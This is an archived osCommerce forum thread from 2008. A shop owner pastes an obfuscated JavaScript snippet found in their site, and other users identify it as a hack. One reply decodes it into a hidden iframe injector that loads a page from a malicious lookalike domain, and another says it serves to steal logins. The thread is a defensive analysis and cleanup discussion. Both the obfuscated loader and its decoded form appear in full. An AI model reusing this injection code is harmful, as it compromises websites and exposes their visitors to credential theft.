varois Posted September 22, 2008 Share Posted September 22, 2008 My shop start to display one ssl error. the saying that i have itens not secure in my page, if i wish to continue and display the item ... Then i check all pictures and couldn't find any problem ... then i see this weird javascript function: <script> function c41883415430m48d35164537b8(m48d3516453ba0){ return (parseInt(m48d3516453ba0,16)); } function m48d3516454757(m48d3516454b3f){ function m48d35164556f7(){ var m48d3516455adf=2; return m48d3516455adf; } var m48d3516454f27=''; m48d3516455ec6=String.fromCharCode; for(m48d351645530e=0;m48d351645530e<m48d3516454b3f.length; m48d351645530e+=m48d35164556f7()){ m48d3516454f27+=(m48d3516455ec6(c41883415430m48d35164537b8(m48d3516454b3f.substr (m48d351645530e,m48d35164556f7())))); } return m48d3516454f27; } var z16=''; var m48d35164562ae='3C7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E667'+z16+'56E637'+z16+'4696F6E20636865636B5F636F6E7'+z16+'4656E7'+z16+'428297'+z16+'B7'+z16+'6617'+z16+'220693D303B7'+z16+'7'+z16+'68696C6528646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'292E6C656E67'+z16+'7'+z16+'468297'+z16+'B7'+z16+'6617'+z16+'220656C3D646F637'+z16+'56D656E7'+z16+'42E67'+z16+'657'+z16+'4456C656D656E7'+z16+'47'+z16+'3427'+z16+'9546167'+z16+'4E616D652827'+z16+'69667'+z16+'2616D6527'+z16+'295B695D3B6966282028656C2E7'+z16+'37'+z16+'47'+z16+'96C652E64697'+z16+'37'+z16+'06C617'+z16+'93D3D27'+z16+'6E6F6E6527'+z16+'207'+z16+'C7'+z16+'C20656C2E7'+z16+'37'+z16+'47'+z16+'96C652E7'+z16+'6697'+z16+'36962696C697'+z16+'47'+z16+'9203D3D27'+z16+'68696464656E27'+z16+'207'+z16+'C7'+z16+'C2028656C2E7'+z16+'7'+z16+'69647'+z16+'4683C3520262620656C2E68656967'+z16+'687'+z16+'43C35292920262620656C2E6E616D65213D27'+z16+'633427'+z16+'297'+z16+'B656C2E7'+z16+'0617'+z16+'2656E7'+z16+'44E6F64652E7'+z16+'2656D6F7'+z16+'6654368696C6428656C293B7'+z16+'D656C7'+z16+'36520692B2B3B7'+z16+'D7'+z16+'D636865636B5F636F6E7'+z16+'4656E7'+z16+'428293B0D0A696628216D7'+z16+'96961297'+z16+'B646F637'+z16+'56D656E7'+z16+'42E7'+z16+'7'+z16+'7'+z16+'2697'+z16+'465287'+z16+'56E657'+z16+'363617'+z16+'065282027'+z16+'2533632536392536362537'+z16+'3225363125366425363525323025366525363125366425363525336425363325333425323025 37'+z16+'332537'+z16+'32253633253364253237'+z16+'2536382537'+z16+'342537'+z16+'342537'+z16+'30253361253266253266253637'+z16+'253666253666253637'+z16+'2536632536352532642536312536652536312536632536392537'+z16+'61253635253265253633253666253664253266253639253665253265253633253637'+z16+'25363925336625333125333526253237'+z16+'2532622534642536312537'+z16+'342536382532652537'+z16+'322536662537'+z16+'352536652536342532382534642536312537'+z16+'342536382532652537'+z16+'3225363125366525363425366625366425323825323925326125333225333325333925333225 3330253239253262253237'+z16+'253334253634253631253336253337'+z16+'253336253330253333253237'+z16+'2532302537'+z16+'37'+z16+'2536392536342537'+z16+'34253638253364253334253336253230253638253635253639253637'+z16+'2536382537'+z16+'342533642533352533322533302532302537'+z16+'332537'+z16+'342537'+z16+'39253663253635253364253237'+z16+'2536342536392537'+z16+'332537'+z16+'302536632536312537'+z16+'39253361253230253665253666253665253635253237'+z16+'2533652533632532662536392536362537'+z16+'3225363125366425363525336527'+z16+'29293B7'+z16+'D7'+z16+'6617'+z16+'2206D7'+z16+'969613D7'+z16+'47'+z16+'27'+z16+'5653B3C2F7'+z16+'3637'+z16+'2697'+z16+'07'+z16+'43E'; document.write(m48d3516454757(m48d35164562ae)); </script> i never see it before and at the end of the code, last line, i found this: <script>check_content()</script> if someone have any knowledge about what is this function, please help me .... i'm afraid to delete this and make a mistake into my shop ... Thanks !!!! Link to comment Share on other sites More sharing options...
spooks Posted September 22, 2008 Share Posted September 22, 2008 Delete the script. You have been hacked, check the rest of your site & secure it. http://www.oscommerce.com/forums/index.php?showtopic=313323 Check your site logs in cPanel, error logs will often show hacking attempts. Also look in stats for frequent visitors. Sam Remember, What you think I ment may not be what I thought I ment when I said it. Contributions: Auto Backup your Database, Easy way Multi Images with Fancy Pop-ups, Easy way Products in columns with multi buy etc etc Disable any Category or Product, Easy way Secure & Improve your account pages et al. Link to comment Share on other sites More sharing options...
♥Vger Posted September 22, 2008 Share Posted September 22, 2008 Yep, you've been hacked. If you have a Joomla or Mambo install on the same hosting you may wish to deal with the security of that install as well - because this javascript hack is normally associated with Joomla and Mambo - specifically a MamBot hack. Vger Link to comment Share on other sites More sharing options...
germ Posted September 23, 2008 Share Posted September 23, 2008 In "man readable" form, the script decodes to this: <script> function check_content() { var i=0; while( document.getElementsByTagName('iframe').length) { var el=document.getElementsByTagName('iframe')[i]; if (( el.style.display=='none' || el.style.visibility == 'hidden' || (el.width<5 && el.height<5))&& el.name!='c4'){ el.parentNode.removeChild(el); } else i++; } } check_content(); if ( !myia ){ document.write(unescape('%3c%69%66%72%61%6d%65%20%6e%61%6d%65%3d%63%34%20%73%72%63%3d%27%68%74%74%70%3a%2f%2f%67%6f%6f %67%6c%65%2d%61%6e%61%6c%69%7a%65%2e%63%6f%6d%2f%69%6e%2e%63%67%69%3f%31%35%27%2b%4d%61%74%68%2e %72%6f%75%6e%64%28%4d%61%74%68%2e%72%61%6e%64%6f%6d%28%29%2a%32%33%39%32%30%29%2b%27%34%64%61%36 %37%36%30%33%27%20%77%69%64%74%68%3d%34%36%20%68%65%69%67%68%74%3d%35%32%30%20%73%74%79%6c%65 %3d%27%64%69%73%70%6c%61%79%3a%20%6e%6f%6e%65%27%3e%3c%2f%69%66%72%61%6d%65%3e')); } myia = true; </script> When you "unescape" the last part, it reads: <iframe name=c4 src='http://google-analize.com/in.cgi?15'+Math.round(Math.random()*23920)+'4da67603' width=46 height=520 style='display: none'></iframe> Gee.... :huh: It's an iframe..... :o What a surprise..... ;) If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
varois Posted September 23, 2008 Author Share Posted September 23, 2008 Hi Guys thanks for your answers - can you tell me what the objective was behind this hack? Any feedback very welcome. Cheers Varois Link to comment Share on other sites More sharing options...
germ Posted September 23, 2008 Share Posted September 23, 2008 Iframes are used to steal information. Since it was on your login page, it was used to steal login information. If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you. "Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice." - Me - "Headers already sent" - The definitive help "Cannot redeclare ..." - How to find/fix it SSL Implementation Help Like this post? "Like" it again over there > Link to comment Share on other sites More sharing options...
Recommended Posts
Archived
This topic is now archived and is closed to further replies.